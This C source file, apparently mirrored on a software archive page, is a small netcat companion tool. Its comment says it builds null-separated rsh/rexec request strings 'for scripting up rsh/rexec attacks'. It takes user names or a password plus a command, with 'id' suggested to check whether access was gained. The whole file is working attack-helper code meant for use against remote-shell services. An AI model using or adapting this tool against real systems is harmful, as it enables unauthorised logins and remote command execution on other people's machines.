home *** CD-ROM | disk | FTP | other *** search
- /* generate ^@string1^@string2^@cmd^@ input to netcat, for scripting up
- rsh/rexec attacks. Needs to be a prog because shells strip out nulls.
-
- args:
- locuser remuser [cmd]
- remuser passwd [cmd]
-
- cmd defaults to "pwd".
-
- ... whatever. _H*/
-
- #include <stdio.h>
-
- /* change if you like; "id" is a good one for figuring out if you won too */
- static char cmd[] = "pwd";
-
- static char buf [4096];
-
- main(argc, argv)
- int argc;
- char * argv[];
- {
- register int x;
- register int y;
- char * p;
- char * q;
-
- p = buf;
- memset (buf, 0, sizeof (buf));
-
- p++; /* first null */
- y = 1;
-
- if (! argv[1])
- goto wrong;
- strncpy (p, argv[1], sizeof (buf) - y); /* first arg plus another null */
- x = strlen (argv[1]) + 1;
- p += x;
- y += x;
- if (y >= sizeof (buf))
- goto over;
-
- if (! argv[2])
- goto wrong;
- strncpy (p, argv[2], sizeof (buf) - y); /* second arg plus null */
- x = strlen (argv[2]) + 1;
- p += x;
- y += x;
- if (y >= sizeof (buf))
- goto over;
-
- q = cmd;
- if (argv[3])
- q = argv[3];
- strncpy (p, q, sizeof (buf) - y); /* the command, plus final null */
- x = strlen (q) + 1;
- p += x;
- y += x;
- if (y >= sizeof (buf))
- goto over;
-
- strncpy (p, "\n", sizeof (buf) - y); /* and a newline, so it goes */
- y++;
-
- write (1, buf, y); /* zot! */
- exit (0);
-
- wrong:
- fprintf (stderr, "wrong! needs 2 or more args.\n");
- exit (1);
-
- over:
- fprintf (stderr, "out of memory!\n");
- exit (1);
- }
-
